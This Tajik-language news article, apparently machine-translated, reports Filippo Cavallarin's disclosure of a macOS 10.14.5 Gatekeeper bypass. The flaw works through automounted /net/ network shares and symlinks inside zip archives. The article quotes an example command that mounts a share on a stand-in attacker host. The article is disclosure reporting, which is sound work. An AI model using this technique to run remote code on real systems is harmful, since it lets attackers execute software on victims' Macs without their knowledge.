Амая Томан Муҳаққиқи амният Филиппо Кавалларин дар блоги худ дар бораи хатогӣ дар macOS 10.14.5 огоҳӣ нашр кард. Ин аз имкони комилан канорагирӣ аз чораҳои амниятии дарвозабон иборат аст. Ба гуфтаи Кавалларин, вай дар моҳи феврали соли ҷорӣ ба Apple хатогӣ ишора карда буд, аммо ширкат онро дар навсозии охирин ислоҳ накардааст.
Gatekeeper аз ҷониби Apple таҳия шудааст ва бори аввал дар соли 2012 ба системаи оператсионии мизи кории он ворид карда шудааст. Ин механизмест, ки бе огоҳӣ ва ризоияти корбар кор кардани барномаро пешгирӣ мекунад. Пас аз зеркашӣ кардани барнома, Gatekeeper ба таври худкор рамзи онро тафтиш мекунад, то бубинад, ки оё нармафзор аз ҷониби Apple дуруст имзо шудааст ё не.
Ин метавонад бошад шавқи шумо
Дар пости блоги худ, Кавалларин қайд мекунад, ки Gatekeeper ба таври нобаёнӣ ҳам нигаҳдории беруна ва ҳам саҳмияҳои шабакаро макони амн мешуморад. Ҳама гуна барномае, ки дар ин ҳадафҳо ҷойгир аст, метавонад ба таври худкор бидуни гузариш аз санҷиши дарвозабон оғоз шавад. Маҳз аз ин хусусият бе огоҳии корбар метавонад барои оғози нармафзори зараровар истифода шавад.
Яке аз ҷанбаҳое, ки дастрасии беиҷозатро фароҳам меорад, ин хусусияти автоматӣ мебошад, ки ба корбарон имкон медиҳад, ки танҳо тавассути муайян кардани роҳе, ки бо "/net/" сар мешавад, ба таври худкор як ҳиссаи шабакаро пайваст кунанд. Ҳамчун мисол, Кавалларин роҳи "ls /net/evil-attacker.com/sharedfolder/"-ро мисол меорад, ки метавонад системаи пардозандаро дар як макони дурдаст бор кунад, ки мундариҷаи ҷузвдони "sharefolder" -ро бор кунад, ки метавонад эҳтимолан зараровар бошад.
Шумо метавонед тарзи кор кардани таҳдидро дар видео бубинед:
Омили дигар он аст, ки агар бойгонии zip дорои пайванди мушаххасе, ки ба функсияи automount оварда мерасонад, мубодила шавад, он аз ҷониби Gatekeeper тафтиш карда намешавад. Бо ин роҳ, ҷабрдида метавонад ба осонӣ бойгонии зарароварро зеркашӣ кунад ва онро кушояд, ки ба ҳамлакунанда имкон медиҳад, ки амалан ҳама гуна нармафзорро дар Mac бидуни огоҳии корбар иҷро кунад. Finder, ки васеъшавии муайянро ба таври нобаёнӣ пинҳон мекунад, инчунин дар ин осебпазирӣ саҳми худро дорад.
Кавалларин дар блоги худ қайд мекунад, ки Apple 22 феврали соли ҷорӣ таваҷҷӯҳро ба осебпазирии системаи амалиётии macOS ҷалб кард. Аммо дар нимаи моҳи май, Apple муошират бо Кавалларинро қатъ кард, аз ин рӯ Кавалларин тасмим гирифт, ки ҳама чизро ошкор кунад.
Сарчашма: FCVL
